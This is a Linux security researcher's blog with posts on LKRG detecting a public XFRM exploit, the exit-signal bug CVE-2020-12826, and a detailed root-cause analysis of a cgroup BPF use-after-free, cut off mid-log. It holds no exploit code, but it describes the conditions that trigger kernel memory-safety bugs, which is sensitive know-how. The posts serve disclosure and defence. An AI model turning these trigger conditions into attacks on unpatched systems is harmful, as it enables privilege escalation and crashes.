pi3 blog

Linux kernel XFRM UAF

21 March 2020 at 01:27
By: pi3

On the 28th of February, I sent a short summary to the lkrg-users mailing list (https://www.openwall.com/lists/lkrg-users/2020/02/28/1) regarding the recent Linux kernel XFRM UAF exploit released by Vitaly Nikolenko. I believe it is worth reading, so I’ve decided to reference it on my blog as well:

Hey,

Vitaly Nikolenko published an exploit for Linux kernel XFRM use-after-free. His tweet with more details can be found here:

centos 8 / rhel 8 / ubuntu 14.04, 16.04, 18.04 poc is uploaded https://t.co/b3IJoxMaHI. The tech report is public too https://t.co/UHsMYScN9Y pic.twitter.com/uDpjEm0ycX

— Vitaly Nikolenko (@vnik5287) February 28, 2020

Detailed description of the bug can be found here:

https://duasynt.com/pub/vnik/01-0311-2018.pdf

I’ve tested his exploit under the latest version of LKRG (from the repo) and it correctly detects and kills it:

[Fri Feb 28 10:04:24 2020] [p_lkrg] Loading LKRG…
[Fri Feb 28 10:04:24 2020] Freezing user space processes … (elapsed 0.008 seconds) done.
[Fri Feb 28 10:04:24 2020] OOM killer disabled.
[Fri Feb 28 10:04:24 2020] [p_lkrg] Verifying 21 potential UMH paths for whitelisting…
[Fri Feb 28 10:04:24 2020] [p_lkrg] 6 UMH paths were whitelisted…
[Fri Feb 28 10:04:25 2020] [p_lkrg] [kretprobe] register_kretprobe() for  failed! [err=-22]
[Fri Feb 28 10:04:25 2020] [p_lkrg] ERROR: Can't hook ovl_create_or_link function :(
[Fri Feb 28 10:04:25 2020] [p_lkrg] LKRG initialized successfully!
[Fri Feb 28 10:04:25 2020] OOM killer enabled.
[Fri Feb 28 10:04:25 2020] Restarting tasks … done.
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] New modification: type[JUMP_LABEL_JMP]!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] Updating kernel core .text section hash!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] New modification: type[JUMP_LABEL_JMP]!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] Updating kernel core .text section hash!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] New modification: type[JUMP_LABEL_JMP]!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] Updating kernel core .text section hash!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] New modification: type[JUMP_LABEL_JMP]!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] Updating kernel core .text section hash!
[Fri Feb 28 10:06:49 2020] [p_lkrg]  process[67342 | lucky0] has different user_namespace!
[Fri Feb 28 10:06:49 2020] [p_lkrg]  process[67342 | lucky0] has different user_namespace!
[Fri Feb 28 10:06:49 2020] [p_lkrg]  Trying to kill process[lucky0 | 67342]!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  Trying to kill process[lucky0 | 81090]!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  Trying to kill process[lucky0 | 81090]!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  Trying to kill process[lucky0 | 81090]!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  Trying to kill process[lucky0 | 81090]!

The latest LKRG detects user_namespace corruption, which in a way proves that our namespace escape detection logic works. When I repeated the same test after reverting the LKRG code base to the commit just before namespace corruption detection was introduced, LKRG still detected the exploit via the standard method:

[Fri Feb 28 10:34:28 2020] [p_lkrg]  process[17599 | lucky0] has different SUID! 1000 vs 0
[Fri Feb 28 10:34:28 2020] [p_lkrg] process[17599 | lucky0] has different GID! 1000 vs 0
[Fri Feb 28 10:34:28 2020] [p_lkrg] process[17599 | lucky0] has different SUID! 1000 vs 0
[Fri Feb 28 10:34:28 2020] [p_lkrg] process[17599 | lucky0] has different GID! 1000 vs 0
[Fri Feb 28 10:34:28 2020] [p_lkrg] Trying to kill process[lucky0 | 17599]!

[Fri Feb 28 10:35:02 2020] [p_lkrg] process[22293 | lucky0] has different SUID! 1000 vs 0
[Fri Feb 28 10:35:02 2020] [p_lkrg] process[22293 | lucky0] has different GID! 1000 vs 0
[Fri Feb 28 10:35:02 2020] [p_lkrg] process[22293 | lucky0] has different SUID! 1000 vs 0
[Fri Feb 28 10:35:02 2020] [p_lkrg] process[22293 | lucky0] has different GID! 1000 vs 0
[Fri Feb 28 10:35:02 2020] [p_lkrg] Trying to kill process[lucky0 | 22293]!

This is an interesting case. Vitaly published only a compiled binary of his exploit (not the source code). This means that adapting his exploit to play a cat-and-mouse game with LKRG is not an easy task. It is possible to reverse-engineer and modify the exploit binary, but that requires more work.

Thanks,

Adam

Linux kernel bug – all kernels insufficiently restrict exit signals

26 March 2020 at 00:09
By: pi3

I’ve recently spent some time looking at the ‘exec_id’ counter. Historically, the Linux kernel had 2 independent security problems related to that code: CVE-2009-1337 and CVE-2012-0056.

Until 2012, the ‘self_exec_id’ field (among others) was used to enforce permission checks for the /proc/pid/{mem/maps/…} interface. However, it was done poorly and a serious security problem was reported, known as “Mempodipper” (CVE-2012-0056). Since that fix, ‘self_exec_id’ is no longer tracked there; instead, the kernel looks at the process’ VM at the time of the open().

In 2009 Oleg Nesterov discovered that the Linux kernel had incorrect logic for resetting ->exit_signal. As a result, a malicious user could bypass the reset by exec’ing a setuid application before exiting (->exit_signal would not be reset to SIGCHLD). CVE-2009-1337 was assigned to track this issue.

The logic responsible for handling ->exit_signal has been changed a few times, and the current logic has been in place since Linux kernel 3.3.5. However, it is not fully robust and it’s still possible for a malicious user to bypass it. Basically, it’s possible to send arbitrary signals to a privileged (suidroot) parent process.

I’ve summarized my analysis and posted it on LKML:
https://lists.openwall.net/linux-kernel/2020/03/24/1803

and kernel-hardening mailing list:
https://www.openwall.com/lists/kernel-hardening/2020/03/25/1

Btw. Kernels 2.0.39 and 2.0.40 look secure 😉

Thanks,
Adam

CVE-2020-12826

15 May 2020 at 00:21
By: pi3

CVE-2020-12826 has been assigned to track the Linux kernel problem which I described in my previous post.

CVE MITRE described the problem pretty accurately:

A signal access-control issue was discovered in the Linux kernel before 5.6.5, aka CID-7395ea4e65c2. Because exec_id in include/linux/sched.h is only 32 bits, an integer overflow can interfere with a do_notify_parent protection mechanism. A child process can send an arbitrary signal to a parent process in a different security domain. Exploitation limitations include the amount of elapsed time before an integer overflow occurs, and the lack of scenarios where signals to a parent process present a substantial operational threat.

RedHat tracks this issue here:

https://bugzilla.redhat.com/show_bug.cgi?id=1822077

Debian here:

https://security-tracker.debian.org/tracker/CVE-2020-12826

Fix can be found here:

https://github.com/torvalds/linux/commit/7395ea4e65c2a00d23185a3f63ad315756ba9cef

Interestingly, the story of insufficiently restricted exit signals might not be over 😉

How did this pass review and get backported to stable kernels? https://t.co/WhBrqUZhrw (Hint: case of right hand not knowing what the left is doing, involving a recent security fix)

— grsecurity (@grsecurity) May 14, 2020

In short, the following patch reintroduces the same problem:

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b5f2006144c6ae941726037120fa1001ddede784

Best regards,
Adam

Effectiveness of Linux Rootkit Detection Tools

15 June 2020 at 03:40
By: pi3

I would like to draw attention to the following tweet from Openwall:

Juho Junnila's Master's Thesis "Effectiveness of Linux Rootkit Detection Tools" shows our LKRG as by far the most effective kernel rootkit detector (of those tested), even though that wasn't our primary focus: https://t.co/pz0r502dK6 h/t @Adam_pi3

— Openwall (@Openwall) June 14, 2020

and the full post on LKRG’s mailing list here:

https://www.openwall.com/lists/lkrg-users/2020/06/14/5

Thanks,
Adam

LKRG 0.8

25 June 2020 at 21:49
By: pi3

Hi,

We’ve just announced a new version of LKRG: 0.8! It includes an enormous number of changes; in fact, so many that we’re not trying to document all of them this time (although they can be seen in the git commits), but rather focus on high-level aspects. I encourage you to read the full announcement here:

https://www.openwall.com/lists/announce/2020/06/25/1

Btw. Among other things, we have added support for Raspberry Pi 3 & 4, better scalability, performance, and tradeoffs, the notion of profiles, new documentation, @Phoronix benchmarks, and more.

Best regards,
Adam

CVE: 2020-14356 & 2020-25220

11 September 2020 at 05:35
By: pi3

The short story of 1 Linux Kernel Use-After-Free bug and 2 CVEs (CVE-2020-14356 and CVE-2020-25220)

Name:     Linux kernel Cgroup BPF Use-After-Free
Author:   Adam Zabrocki ([email protected])
Date:       May 27, 2020

First things first – short history:

In 2019 Tejun Heo discovered a race condition in the lifetime of cgroup_bpf which could result in a double-free and other memory corruptions. This bug was fixed in kernel 5.3. More information about the problem and the patch can be found here:

https://lore.kernel.org/patchwork/patch/1094080/

Roman Gushchin discovered another problem with the newly fixed code which could lead to a use-after-free vulnerability. His report and fix can be found here:

https://lore.kernel.org/bpf/[email protected]/

During the discussion on the fix, Alexei Starovoitov pointed out that walking through the cgroup hierarchy without holding cgroup_mutex might be dangerous:

https://lore.kernel.org/bpf/[email protected]/

However, Roman and Alexei concluded that it shouldn’t be a problem:

https://lore.kernel.org/bpf/[email protected]/

Unfortunately, there is another Use-After-Free bug related to the Cgroup BPF release logic.

The “new” bug – details (a lot of details ;-)):

During LKRG development and testing, one of my VMs was generating a kernel crash during the shutdown procedure. This specific machine had the newest kernel at that time (5.7.x), which I had compiled with all debug information as well as the SLAB DEBUG feature. When I analyzed the crash, it turned out to have nothing to do with LKRG. Later I confirmed that kernels without LKRG always hit that issue:

      KERNEL: linux-5.7/vmlinux
    DUMPFILE: /var/crash/202006161848/dump.202006161848  [PARTIAL DUMP]
        CPUS: 1
        DATE: Tue Jun 16 18:47:40 2020
      UPTIME: 14:09:24
LOAD AVERAGE: 0.21, 0.37, 0.50
       TASKS: 234
    NODENAME: oi3
     RELEASE: 5.7.0-g4
     VERSION: #28 SMP PREEMPT Fri Jun 12 18:09:14 UTC 2020
     MACHINE: x86_64  (3694 Mhz)
      MEMORY: 8 GB
       PANIC: "Oops: 0000 [#1] PREEMPT SMP PTI" (check log for details)
         PID: 1060499
     COMMAND: "sshd"
        TASK: ffff9d8c36b33040  [THREAD_INFO: ffff9d8c36b33040]
         CPU: 0
       STATE:  (PANIC)

crash> bt
PID: 1060499  TASK: ffff9d8c36b33040  CPU: 0   COMMAND: "sshd"
 #0 [ffffb0fc41b1f990] machine_kexec at ffffffff9404d22f
 #1 [ffffb0fc41b1f9d8] __crash_kexec at ffffffff941c19b8
 #2 [ffffb0fc41b1faa0] crash_kexec at ffffffff941c2b60
 #3 [ffffb0fc41b1fab0] oops_end at ffffffff94019d3e
 #4 [ffffb0fc41b1fad0] page_fault at ffffffff95c0104f
    [exception RIP: __cgroup_bpf_run_filter_skb+401]
    RIP: ffffffff9423e801  RSP: ffffb0fc41b1fb88  RFLAGS: 00010246
    RAX: 0000000000000000  RBX: ffff9d8d56ae1ee0  RCX: 0000000000000028
    RDX: 0000000000000000  RSI: ffff9d8e25c40b00  RDI: ffffffff9423e7f3
    RBP: 0000000000000000   R8: 0000000000000000   R9: 0000000000000000
    R10: 0000000000000003  R11: 0000000000000000  R12: 0000000000000000
    R13: 0000000000000000  R14: 0000000000000000  R15: 0000000000000001
    ORIG_RAX: ffffffffffffffff  CS: 0010  SS: 0018
 #5 [ffffb0fc41b1fbd0] ip_finish_output at ffffffff957d71b3
 #6 [ffffb0fc41b1fbf8] __ip_queue_xmit at ffffffff957d84e1
 #7 [ffffb0fc41b1fc50] __tcp_transmit_skb at ffffffff957f4b27
 #8 [ffffb0fc41b1fd58] tcp_write_xmit at ffffffff957f6579
 #9 [ffffb0fc41b1fdb8] __tcp_push_pending_frames at ffffffff957f737d
#10 [ffffb0fc41b1fdd0] tcp_close at ffffffff957e6ec1
#11 [ffffb0fc41b1fdf8] inet_release at ffffffff9581809f
#12 [ffffb0fc41b1fe10] __sock_release at ffffffff95616848
#13 [ffffb0fc41b1fe30] sock_close at ffffffff956168bc
#14 [ffffb0fc41b1fe38] __fput at ffffffff942fd3cd
#15 [ffffb0fc41b1fe78] task_work_run at ffffffff94148a4a
#16 [ffffb0fc41b1fe98] do_exit at ffffffff9412b144
#17 [ffffb0fc41b1ff08] do_group_exit at ffffffff9412b8ae
#18 [ffffb0fc41b1ff30] __x64_sys_exit_group at ffffffff9412b92f
#19 [ffffb0fc41b1ff38] do_syscall_64 at ffffffff940028d7
#20 [ffffb0fc41b1ff50] entry_SYSCALL_64_after_hwframe at ffffffff95c0007c
    RIP: 00007fe54ea30136  RSP: 00007fff33413468  RFLAGS: 00000202
    RAX: ffffffffffffffda  RBX: 00007fff334134e0  RCX: 00007fe54ea30136
    RDX: 00000000000000ff  RSI: 000000000000003c  RDI: 00000000000000ff
    RBP: 00000000000000ff   R8: 00000000000000e7   R9: fffffffffffffdf0
    R10: 000055a091a22d09  R11: 0000000000000202  R12: 000055a091d67f20
    R13: 00007fe54ea5afa0  R14: 000055a091d7ef70  R15: 000055a091d70a20
    ORIG_RAX: 00000000000000e7  CS: 0033  SS: 002b

PID 1060499 is a child of sshd:

...
root        5462  0.0  0.0  12168  7276 ?        Ss   04:38   0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
...
root     1060499  0.0  0.1  13936  9056 ?        Ss   17:51   0:00  \_ sshd: pi3 [priv]
pi3      1062463  0.0  0.0  13936  5852 ?        S    17:51   0:00      \_ sshd: [email protected]/3
...

The crash happens in the function “__cgroup_bpf_run_filter_skb”, at exactly this piece of code:

0xffffffff9423e7ee <__cgroup_bpf_run_filter_skb+382>: callq  0xffffffff94153cb0 <preempt_count_add>
0xffffffff9423e7f3 <__cgroup_bpf_run_filter_skb+387>: callq  0xffffffff941925a0 <__rcu_read_lock>
0xffffffff9423e7f8 <__cgroup_bpf_run_filter_skb+392>: mov 0x3e8(%rbp),%rax
0xffffffff9423e7ff <__cgroup_bpf_run_filter_skb+399>: xor %ebp,%ebp
0xffffffff9423e801 <__cgroup_bpf_run_filter_skb+401>: mov 0x10(%rax),%rdi
                                                          ^^^^^^^^^^^^^^^
0xffffffff9423e805 <__cgroup_bpf_run_filter_skb+405>: lea 0x10(%rax),%r14
0xffffffff9423e809 <__cgroup_bpf_run_filter_skb+409>: test %rdi,%rdi

where RAX: 0000000000000000. However, when I was playing with repro under SLAB_DEBUG, I often got RAX: 6b6b6b6b6b6b6b6b:

    [exception RIP: __cgroup_bpf_run_filter_skb+401]
    RIP: ffffffff9123e801  RSP: ffffb136c16ffb88  RFLAGS: 00010246
    RAX: 6b6b6b6b6b6b6b6b  RBX: ffff9ce3e5a0e0e0  RCX: 0000000000000028
    RDX: 0000000000000000  RSI: ffff9ce3de26b280  RDI: ffffffff9123e7f3
    RBP: 0000000000000000   R8: 0000000000000000   R9: 0000000000000000
    R10: 0000000000000003  R11: 0000000000000000  R12: 0000000000000000
    R13: 0000000000000000  R14: 0000000000000000  R15: 0000000000000001

So we have a kind of Use-After-Free bug. This bug is triggerable from user-mode. I’ve looked at the binary in IDA:

.text:FFFFFFFF8123E7EE skb = rbx      ; sk_buff * ; PIC mode
.text:FFFFFFFF8123E7EE type = r15     ; bpf_attach_type
.text:FFFFFFFF8123E7EE save_sk = rsi  ; sock *
.text:FFFFFFFF8123E7EE        call    near ptr preempt_count_add-0EAB43h
.text:FFFFFFFF8123E7F3        call    near ptr __rcu_read_lock-0AC258h ; PIC mode
.text:FFFFFFFF8123E7F8        mov     ret, [rbp+3E8h]
.text:FFFFFFFF8123E7FF        xor     ebp, ebp
.text:FFFFFFFF8123E801 _cn = rbp      ; u32
.text:FFFFFFFF8123E801        mov     rdi, [ret+10h]  ; prog
.text:FFFFFFFF8123E805        lea     r14, [ret+10h]

and this code is referencing cgroups from the socket. Source code:

int __cgroup_bpf_run_filter_skb(struct sock *sk,
				struct sk_buff *skb,
				enum bpf_attach_type type)
{
    ...
	struct cgroup *cgrp;
    ...
    ...
	cgrp = sock_cgroup_ptr(&sk->sk_cgrp_data);
    ...
	if (type == BPF_CGROUP_INET_EGRESS) {
		ret = BPF_PROG_CGROUP_INET_EGRESS_RUN_ARRAY(
			cgrp->bpf.effective[type], skb, __bpf_prog_run_save_cb);
    ...
    ...
}

Debugger:

crash> x/4i 0xffffffff9423e7f8
   0xffffffff9423e7f8:  mov    0x3e8(%rbp),%rax
   0xffffffff9423e7ff:  xor    %ebp,%ebp
   0xffffffff9423e801:  mov    0x10(%rax),%rdi
   0xffffffff9423e805:  lea    0x10(%rax),%r14
crash> p/x (int)&((struct cgroup*)0)->bpf
$2 = 0x3e0
crash> ptype struct cgroup_bpf
type = struct cgroup_bpf {
    struct bpf_prog_array *effective[28];
    struct list_head progs[28];
    u32 flags[28];
    struct bpf_prog_array *inactive;
    struct percpu_ref refcnt;
    struct work_struct release_work;
}
crash> print/a sizeof(struct bpf_prog_array)
$3 = 0x10
crash> print/a ((struct sk_buff *)0xffff9ce3e5a0e0e0)->sk
$4 = 0xffff9ce3de26b280
crash> print/a ((struct sock *)0xffff9ce3de26b280)->sk_cgrp_data
$5 = {
  {
    {
      is_data = 0x0,
      padding = 0x68,
      prioidx = 0xe241,
      classid = 0xffff9ce3
    },
    val = 0xffff9ce3e2416800
  }
}

We also know that R15: 0000000000000001 == type == BPF_CGROUP_INET_EGRESS

crash> p/a ((struct cgroup *)0xffff9ce3e2416800)->bpf.effective[1]
$6 = 0x6b6b6b6b6b6b6b6b
crash> x/20a 0xffff9ce3e2416800
0xffff9ce3e2416800:     0x6b6b6b6b6b6b016b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416810:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416820:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416830:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416840:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416850:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416860:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416870:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416880:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416890:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
crash>

This pointer (struct cgroup *)

	cgrp = sock_cgroup_ptr(&sk->sk_cgrp_data);

points to the freed object. However, the kernel still keeps eBPF rules attached to the socket under cgroups. When the process (sshd) dies (do_exit() call) and cleanup is executed, all sockets are closed. If such a socket has “pending” packets, the following code path is executed:

do_exit -> ... -> sock_close -> __sock_release -> inet_release -> tcp_close -> __tcp_push_pending_frames -> tcp_write_xmit -> __tcp_transmit_skb -> __ip_queue_xmit -> ip_finish_output -> __cgroup_bpf_run_filter_skb

However, there is nothing wrong with such logic and path. The real problem is that cgroups disappeared while still holding active clients. How is that even possible? Just before the crash I can see the following entry in kernel logs:

[190820.457422] ------------[ cut here ]------------
[190820.457465] percpu ref (cgroup_bpf_release_fn) <= 0 (-70581) after switching to atomic
                            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[190820.457511] WARNING: CPU: 0 PID: 9 at lib/percpu-refcount.c:161 percpu_ref_switch_to_atomic_rcu+0x112/0x120
[190820.457511] Modules linked in: [last unloaded: p_lkrg]
[190820.457513] CPU: 0 PID: 9 Comm: ksoftirqd/0 Kdump: loaded Tainted: G           OE     5.7.0-g4 #28
[190820.457513] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 04/13/2018
[190820.457515] RIP: 0010:percpu_ref_switch_to_atomic_rcu+0x112/0x120
[190820.457516] Code: eb b6 80 3d 11 95 5a 02 00 0f 85 65 ff ff ff 48 8b 55 d8 48 8b 75 e8 48 c7 c7 d0 9f 78 93 c6 05 f5 94 5a 02 01 e8 00 57 88 ff <0f> 0b e9 43 ff ff ff 0f 0b eb 9d cc cc cc 8d 8c 16 ef be ad de 89
[190820.457516] RSP: 0018:ffffb136c0087e00 EFLAGS: 00010286
[190820.457517] RAX: 0000000000000000 RBX: 7ffffffffffeec4a RCX: 0000000000000000
[190820.457517] RDX: 0000000000000101 RSI: ffffffff949235c0 RDI: 00000000ffffffff
[190820.457517] RBP: ffff9ce3e204af20 R08: 6d6f7461206f7420 R09: 63696d6f7461206f
[190820.457517] R10: 7320726574666120 R11: 676e696863746977 R12: 00003452c5002ce8
[190820.457518] R13: ffff9ce3f6e2b450 R14: ffff9ce2c7fc3100 R15: 0000000000000000
[190820.457526] FS:  0000000000000000(0000) GS:ffff9ce3f6e00000(0000) knlGS:0000000000000000
[190820.457527] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[190820.457527] CR2: 00007f516c2b9000 CR3: 0000000222c64006 CR4: 00000000003606f0
[190820.457550] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[190820.457551] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[190820.457551] Call Trace:
[190820.457577]  rcu_core+0x1df/0x530
[190820.457598]  ? smpboot_register_percpu_thread+0xd0/0xd0
[190820.457609]  __do_softirq+0xfc/0x331
[190820.457629]  ? smpboot_register_percpu_thread+0xd0/0xd0
[190820.457630]  run_ksoftirqd+0x21/0x30
[190820.457649]  smpboot_thread_fn+0x195/0x230
[190820.457660]  kthread+0x139/0x160
[190820.457670]  ? __kthread_bind_mask+0x60/0x60
[190820.457671]  ret_from_fork+0x35/0x40
[190820.457682] ---[ end trace 63d2aef89e998452 ]---

I tested the same scenario a few times and got the following results:

 percpu ref (cgroup_bpf_release_fn) <= 0 (-70581) after switching to atomic
 percpu ref (cgroup_bpf_release_fn) <= 0 (-18829) after switching to atomic
 percpu ref (cgroup_bpf_release_fn) <= 0 (-29849) after switching to atomic

Let’s look at this function:

/**
 * cgroup_bpf_release_fn() - callback used to schedule releasing
 *                           of bpf cgroup data
 * @ref: percpu ref counter structure
 */
static void cgroup_bpf_release_fn(struct percpu_ref *ref)
{
	struct cgroup *cgrp = container_of(ref, struct cgroup, bpf.refcnt);

	INIT_WORK(&cgrp->bpf.release_work, cgroup_bpf_release);
	queue_work(system_wq, &cgrp->bpf.release_work);
}

So that’s the callback used to release bpf cgroup data. It sounds like it is being called while there could still be an active socket attached to such a cgroup:

/**
 * cgroup_bpf_release() - put references of all bpf programs and
 *                        release all cgroup bpf data
 * @work: work structure embedded into the cgroup to modify
 */
static void cgroup_bpf_release(struct work_struct *work)
{
	struct cgroup *p, *cgrp = container_of(work, struct cgroup,
					       bpf.release_work);
	struct bpf_prog_array *old_array;
	unsigned int type;

	mutex_lock(&cgroup_mutex);

	for (type = 0; type < ARRAY_SIZE(cgrp->bpf.progs); type++) {
		struct list_head *progs = &cgrp->bpf.progs[type];
		struct bpf_prog_list *pl, *tmp;

		list_for_each_entry_safe(pl, tmp, progs, node) {
			list_del(&pl->node);
			if (pl->prog)
				bpf_prog_put(pl->prog);
			if (pl->link)
				bpf_cgroup_link_auto_detach(pl->link);
			bpf_cgroup_storages_unlink(pl->storage);
			bpf_cgroup_storages_free(pl->storage);
			kfree(pl);
			static_branch_dec(&cgroup_bpf_enabled_key);
		}
		old_array = rcu_dereference_protected(
				cgrp->bpf.effective[type],
				lockdep_is_held(&cgroup_mutex));
		bpf_prog_array_free(old_array);
	}

	mutex_unlock(&cgroup_mutex);

	for (p = cgroup_parent(cgrp); p; p = cgroup_parent(p))
		cgroup_bpf_put(p);

	percpu_ref_exit(&cgrp->bpf.refcnt);
	cgroup_put(cgrp);
}

while:

static void bpf_cgroup_link_auto_detach(struct bpf_cgroup_link *link)
{
	cgroup_put(link->cgroup);
	link->cgroup = NULL;
}

So if a cgroup dies, all the potential clients are auto-detached. However, they might not be aware of that situation. When is cgroup_bpf_release_fn() executed?

/**
 * cgroup_bpf_inherit() - inherit effective programs from parent
 * @cgrp: the cgroup to modify
 */
int cgroup_bpf_inherit(struct cgroup *cgrp)
{
    ...
  	ret = percpu_ref_init(&cgrp->bpf.refcnt, cgroup_bpf_release_fn, 0,
			      GFP_KERNEL);
    ...
}

It is automatically executed when cgrp->bpf.refcnt drops to zero. However, in the warning logged before the kernel crashed, we saw that this reference counter was already below 0. The cgroup had already been freed.

Originally, I thought that the problem might be related to the code walking through the cgroup hierarchy without holding cgroup_mutex, which was pointed out by Alexei. I prepared a patch and recompiled the kernel:

$ diff -u cgroup.c linux-5.7/kernel/bpf/cgroup.c
--- cgroup.c    2020-05-31 23:49:15.000000000 +0000
+++ linux-5.7/kernel/bpf/cgroup.c       2020-07-17 16:31:10.712969480 +0000
@@ -126,11 +126,11 @@
                bpf_prog_array_free(old_array);
        }

-       mutex_unlock(&cgroup_mutex);
-
        for (p = cgroup_parent(cgrp); p; p = cgroup_parent(p))
                cgroup_bpf_put(p);

+       mutex_unlock(&cgroup_mutex);
+
        percpu_ref_exit(&cgrp->bpf.refcnt);
        cgroup_put(cgrp);
 }

Interestingly, without this patch I was able to trigger this kernel crash every time I rebooted the machine (100% repro). With the patch applied, the crash rate dropped to around 30%. However, I was still able to hit the same code path and generate a kernel dump. The patch does help, but it does not address the real problem, since I can still hit the crash (just much less often).

I stepped back and looked again at where the bug is. The corrupted pointer (struct cgroup *) comes from this line:

	cgrp = sock_cgroup_ptr(&sk->sk_cgrp_data);

This code is related to CONFIG_SOCK_CGROUP_DATA. The Linux source has an interesting comment about it in the “cgroup-defs.h” file:

/*
 * sock_cgroup_data is embedded at sock->sk_cgrp_data and contains
 * per-socket cgroup information except for memcg association.
 *
 * On legacy hierarchies, net_prio and net_cls controllers directly set
 * attributes on each sock which can then be tested by the network layer.
 * On the default hierarchy, each sock is associated with the cgroup it was
 * created in and the networking layer can match the cgroup directly.
 *
 * To avoid carrying all three cgroup related fields separately in sock,
 * sock_cgroup_data overloads (prioidx, classid) and the cgroup pointer.
 * On boot, sock_cgroup_data records the cgroup that the sock was created
 * in so that cgroup2 matches can be made; however, once either net_prio or
 * net_cls starts being used, the area is overriden to carry prioidx and/or
 * classid.  The two modes are distinguished by whether the lowest bit is
 * set.  Clear bit indicates cgroup pointer while set bit prioidx and
 * classid.
 *
 * While userland may start using net_prio or net_cls at any time, once
 * either is used, cgroup2 matching no longer works.  There is no reason to
 * mix the two and this is in line with how legacy and v2 compatibility is
 * handled.  On mode switch, cgroup references which are already being
 * pointed to by socks may be leaked.  While this can be remedied by adding
 * synchronization around sock_cgroup_data, given that the number of leaked
 * cgroups is bound and highly unlikely to be high, this seems to be the
 * better trade-off.
 */

and later:

/*
 * There's a theoretical window where the following accessors race with
 * updaters and return part of the previous pointer as the prioidx or
 * classid.  Such races are short-lived and the result isn't critical.
 */

This means that sock_cgroup_data “carries” the information about whether net_prio or net_cls has started being used; in that case sock_cgroup_data overloads (prioidx, classid) and the cgroup pointer. From our crash we can extract this information:

crash> print/a ((struct sock *)0xffff9ce3de26b280)->sk_cgrp_data
$5 = {
  {
    {
      is_data = 0x0,
      padding = 0x68,
      prioidx = 0xe241,
      classid = 0xffff9ce3
    },
    val = 0xffff9ce3e2416800
  }
}

The socket described above keeps the “sk_cgrp_data” pointer, which indicates that it is “attached” to cgroup2. However, that cgroup2 has already been destroyed.
Now we have all the information to solve the mystery of this bug:

  1. A process creates a socket and both of them are inside some cgroup v2 (non-root)
    • cgroup BPF is cgroup2 only
  2. At some point net_prio or net_cls starts being used:
    • this operation disables cgroup2 socket matching
    • now, all related sockets should be converted to use net_prio, and sk_cgrp_data should be updated
  3. The socket is cloned, but not the reference to the cgroup (ref: point 1)
    • this essentially moves the socket to the new cgroup
  4. All tasks in the old cgroup (ref: point 1) must die, and when this happens, the cgroup dies as well
  5. When the original process starts to “use” the socket, it might attempt to access the cgroup which is already “dead”. This essentially creates a Use-After-Free condition
    • in my specific case, the process was killed or invoked exit()
    • during the execution of the do_exit() function, all file descriptors and all sockets are closed
    • one of the sockets still points to the previously destroyed cgroup2 BPF (OpenSSH might install BPF)
    • __cgroup_bpf_run_filter_skb runs attached BPF and we have Use-After-Free

To confirm that scenario, I’ve modified some of the Linux kernel sources:

  1. Function cgroup_sk_alloc_disable():
    • I’ve added dump_stack();
  2. Function cgroup_bpf_release():
    • I’ve moved mutex to guard code responsible for walking through the cgroup hierarchy

I’ve managed to reproduce this bug again and this is what I can see in the logs:

...
[   72.061197] kmem.limit_in_bytes is deprecated and will be removed. Please report your usecase to [email protected] if you depend on this functionality.
[   72.121572] cgroup: cgroup: disabling cgroup2 socket matching due to net_prio or net_cls activation
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[   72.121574] CPU: 0 PID: 6958 Comm: kubelet Kdump: loaded Not tainted 5.7.0-g6 #32
[   72.121574] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 04/13/2018
[   72.121575] Call Trace:
